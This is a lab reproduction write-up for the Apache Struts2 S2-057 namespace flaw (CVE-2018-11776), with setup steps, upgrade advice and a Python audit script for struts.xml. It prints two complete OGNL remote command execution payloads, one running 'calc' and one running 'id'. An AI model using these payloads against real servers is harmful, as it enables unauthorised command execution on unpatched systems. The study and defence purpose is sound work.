Apache Struts2 namespace remote command execution (CVE-2018-11776 / S2-057): vulnerability reproduction
I. Vulnerability description
S2-057 is caused by a Struts XML configuration in which a package is declared without a namespace (or with a wildcard namespace) and one of its actions uses a redirectAction or chain result that does not set a namespace of its own. The same applies to url tags in JSPs that set neither value nor action. When struts.mapper.alwaysSelectFullNamespace is true (as it is in the showcase application), Struts takes the namespace from the request URL instead of the configuration, and that user-controlled value is passed through OGNL evaluation without any filtering. An attacker can therefore place an OGNL expression in the namespace segment of the URL and execute arbitrary commands on the server.
II. Affected versions
Apache Struts 2.3 through 2.3.34
Apache Struts 2.5 through 2.5.16
III. Environment setup and reproduction
Environment: Windows 7 + Tomcat 7.0 + Struts 2.5.16
1. Download the official Struts 2.5.16 showcase application (struts2-showcase.war).
2. Deploy struts2-showcase into Tomcat's webapps directory.
3. Open struts-actionchaining.xml in the deployed application (under WEB-INF/classes); two things need to be changed.
4. In struts-actionchaining.xml, remove the namespace attribute from the package and change the result type to redirectAction.
Modified configuration:
    <struts>
        <package name="actionchaining" extends="struts-default">
            <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
                <result type="redirectAction">
                    <param name="actionName">register2</param>
                </result>
            </action>
        </package>
    </struts>
5. Restart Tomcat.
6. Browse to http://192.168.10.230:8080/struts2-showcase/; the vulnerable environment is ready.
7. Exploitation is simple: construct a URL whose namespace segment is an OGNL expression, followed by the action name from the name attribute of the action tag in the configuration, ending in .action.
Browsing to http://192.168.10.230:8080/struts2-showcase/${100*100}/actionChain1.action evaluates the OGNL expression ${100*100}.
8. The server redirects to the action configured in the redirectAction result, using the evaluated value as the namespace (.../10000/register2.action). S2-057 has been triggered successfully.
9. Pop a calculator. Note that exec('calc') runs on the target server, so the calculator appears there (and only if Tomcat runs in an interactive session), not on the machine running the browser; the PoC reads the process output back into the HTTP response.
PoC (URL-encode before sending):
${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('calc').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#jas502n.println(#d),#jas502n.close())}
This payload relies on flipping #_memberAccess["allowStaticMethodAccess"], which newer Struts releases block. If it does not execute on the target, use the payload in the Docker section below, which swaps in OgnlContext.DEFAULT_MEMBER_ACCESS and clears the OGNL exclusion lists instead.
IV. Defence
1. Upgrade to Apache Struts 2.3.35 or 2.5.17 (or later).
2. Always set an explicit namespace on every package and on every redirectAction/chain result, and set value or action on every url tag in JSPs, so the namespace can never be taken from the request URL.
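As an added check (not part of the original write-up or of Struts), the following Python script audits a struts.xml for the configuration pattern behind S2-057: a package whose namespace is missing or contains a wildcard, with a redirectAction, chain or postback result that does not pin its own namespace. The two XML samples are constructed from the modified struts-actionchaining.xml above and a fixed variant; NAMESPACE_SENSITIVE_RESULTS and the function names are this example's own.

```python
"""Added configuration audit for the S2-057 (CVE-2018-11776) pattern: a package
with no (or a wildcard) namespace whose redirectAction/chain/postback result
does not pin a namespace, so Struts takes it from the request URL."""
import xml.etree.ElementTree as ET

# Result types that build their target action from the namespace.
NAMESPACE_SENSITIVE_RESULTS = {"redirectAction", "chain", "postback"}

# Constructed sample: struts-actionchaining.xml as modified in the write-up.
VULNERABLE_XML = """<struts>
  <package name="actionchaining" extends="struts-default">
    <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
      <result type="redirectAction">
        <param name="actionName">register2</param>
      </result>
    </action>
  </package>
</struts>"""

# Constructed sample: same package with the namespace pinned on both the
# package and the result (the advisory's workaround).
FIXED_XML = """<struts>
  <package name="actionchaining" namespace="/actionchaining" extends="struts-default">
    <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
      <result type="redirectAction">
        <param name="actionName">register2</param>
        <param name="namespace">/</param>
      </result>
    </action>
  </package>
</struts>"""


def audit_struts_xml(xml_text):
    """Return (package, action, result type) triples matching the S2-057 pattern."""
    root = ET.fromstring(xml_text)
    findings = []
    for pkg in root.iter("package"):
        ns = (pkg.get("namespace") or "").strip()
        if ns and "*" not in ns:
            continue  # explicit, non-wildcard namespace: the URL cannot supply it
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                rtype = result.get("type", "dispatcher")  # Struts default type
                if rtype not in NAMESPACE_SENSITIVE_RESULTS:
                    continue
                params = {p.get("name"): (p.text or "").strip() for p in result.findall("param")}
                if params.get("namespace"):
                    continue  # the result pins its own namespace
                findings.append((pkg.get("name"), action.get("name"), rtype))
    return findings


def full_namespace_enabled(xml_text):
    """True if this file sets struts.mapper.alwaysSelectFullNamespace to true.

    The pattern flagged above is only reachable with this constant on (the
    showcase enables it). The constant may also live in struts.properties,
    which this function does not read.
    """
    root = ET.fromstring(xml_text)
    for const in root.iter("constant"):
        if const.get("name") == "struts.mapper.alwaysSelectFullNamespace":
            return (const.get("value") or "").strip().lower() == "true"
    return False


if __name__ == "__main__":
    for label, xml_text in (("vulnerable", VULNERABLE_XML), ("fixed", FIXED_XML)):
        print(label, audit_struts_xml(xml_text))
```

Run it against every struts*.xml in WEB-INF/classes (the audit reads one file at a time and does not follow include elements); any finding in a deployment that also enables alwaysSelectFullNamespace is a candidate for the redirect test shown in the reproduction steps.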
Reproduction with Docker (vulhub)
1. Build the vulnerable environment with vulhub (in its struts2/s2-057 directory):
docker-compose up -d
2. After the environment has started, access http://172.17.0.1:8080/struts2-showcase/
3. Intercept the request with Burp and modify it as described in the vulnerability section above (the payload goes in the namespace segment of the URL).
4. Verify with the PoC.
PoC:
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
5. Put the PoC in the namespace position of the URL; the output of id in the redirect confirms the vulnerability. Note: the PoC must be URL-encoded.
-----------------------------------------------------------------------------------------------------------
Reference: https://github.com/vulhub/vulhub/tree/master/struts2/s2-057